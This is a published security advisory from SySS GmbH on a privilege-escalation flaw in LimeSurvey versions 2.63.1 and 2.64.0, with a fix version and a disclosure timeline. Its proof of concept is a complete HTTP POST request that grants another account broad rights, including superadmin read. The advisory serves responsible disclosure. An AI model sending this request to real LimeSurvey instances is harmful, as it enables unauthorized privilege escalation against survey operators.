-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-015
Product: LimeSurvey
Manufacturer: LimeSurvey GmbH
Affected Version(s): Version 2.63.1+170305, Version 2.64.0+170307
Tested Version(s): Version 2.63.1+170305, Version 2.64.0+170307
Vulnerability Type: Improper Handling of Insufficient Privileges (CWE-274) 
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2017-03-24
Solution Date: 2017-05-22
Public Disclosure: 2017-07-26
CVE Reference: Not yet assigned
Author of Advisory: Manuel Stotz & Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The aim of the LimeSurvey application is to support users setting up 
surveys (see [1]). This Open Source product can be used for both offline 
and online surveys.

The LimeSurvey application is vulnerable to privilege escalation
attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH identified that a user is able to set additional rights for
another user. For example, if user A is only allowed to view templates,
he is nevertheless able to set additional template rights, such as
updating and deleting, for user B. Importantly, user A does not need to
have any rights to update, create, etc. users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

First, an authenticated user sends the following request with the 
[USERID] of the user whose rights will be changed. 

POST /index.php/admin/user/sa/savepermissions HTTP/1.1 
Host: [HOST]
Referer: http://[HOST]/index.php/admin/user/sa/setuserpermissions 
Cookie: PHPSESSID=[SESSIONID]; YII_CSRF_TOKEN=[TOKEN]
Connection: close 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 1114
 
YII_CSRF_TOKEN=[TOKEN]&all_participantpanel=on&perm_participantpanel_create=on&perm_participantpanel_read=on&perm_participantpanel_update=on&perm_participantpanel_delete=on&perm_participantpanel_import=on&perm_participantpanel_export=on&all_labelsets=on&perm_labelsets_create=on&perm_labelsets_read=on&perm_labelsets_update=on&perm_labelsets_delete=on&perm_labelsets_import=on&perm_labelsets_export=on&all_settings=on&perm_settings_read=on&perm_settings_update=on&perm_settings_import=on&all_surveys=on&perm_surveys_create=on&perm_surveys_read=on&perm_surveys_update=on&perm_surveys_delete=on&perm_surveys_export=on&all_templates=on&perm_templates_create=on&perm_templates_read=on&perm_templates_update=on&perm_templates_delete=on&perm_templates_import=on&perm_templates_export=on&all_usergroups=on&perm_usergroups_create=on&perm_usergroups_read=on&perm_usergroups_update=on&perm_usergroups_delete=on&all_users=on&perm_users_create=on&perm_users_read=on&perm_users_update=on&perm_users_delete=on&perm_superadmin_read=on&all_auth_db=on&perm_auth_db_read=on&action=surveyrights&uid=[USERID]

The consequence is that user B gets the rights of user A. In addition, 
he obtains all other rights (i.e. updating, deleting, viewing, etc.) 
within the same category. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade LimeSurvey to Version 2.65.1 (build 170522) or later.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2017-03-09: Vulnerability discovered
2017-03-24: Vulnerability reported to Manufacturer
2017-05-22: Vulnerability resolved in Version 2.65.1 (build 170522)
2017-07-26: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product web site for LimeSurvey
    https://www.limesurvey.org
[2] SySS Security Advisory SYSS-2017-015
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-015.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Manuel Stotz and described by 
Dr. Erlijn van Genuchten of SySS GmbH.

E-Mail: manuel.stotz@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key ID: 0xBCE68C6D
Key Fingerprint: F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D

E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Erlijn_van_Genuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJZcHAPAAoJEAylhje9lv8qYyMP/3YHx4t36smKVwIHmmiLroFU
Mc3QsLJF/LXcvlWLUWij31Jqpc6pdtmM2XMapVdxQp2S0Ih9vmqyfThfInLNmv+U
Zxnnh4Ou+K0lamaE+mV5lYV/h6YKKc1wkcMNSVNeXl4J8HhJD7sBiHugQ/lTy/qf
BvcyTsfO9YStJ57HGfZ3If4KTo34tPHF1+bfVtl2Auyb5zzqxlkXcpgOBDvKU8TC
vb+wlQPgSB1tNfsw0b628145oAPPeNt8V1KcIsPP1sxPgqopTP5XQDdzQCttRsDM
j/xR8ViVzwDsa3i+0d0iRLbiQskfGgerA0ghMwbAofes7veKHDzqF3IH+BP7O6p1
/TEMcuhgoscjF5RIPFWLCLPSs9FX2a6r+U/TP7+pDM7LnVxojJxPT7zquoUWg/GS
satm0D0kknWdzcTYBwnIqpqybwWmKjaKkaWi03WiphHDaIxXdOvTFPzxX/JeQ2rA
RkLm58LhAHTPTOSh+YPji64ZWAYKElcLX5EXiPAUR+xc1aiEZSAWkm6qLxN8QHVJ
jKe7m2evwDeyjyFlYcUKTWwSAzzBsa98RA3CUcdaCQ0L5QtBRV1ScLh4UhxrXEsp
GA0qXDIHUJ1kbLw51rtHrnK+6px7RELEHzvlSHgNsEnT1qTl+taWsiYYoAW7iRds
Ft+8QewlWBneo03I8796
=mjJu
-----END PGP SIGNATURE-----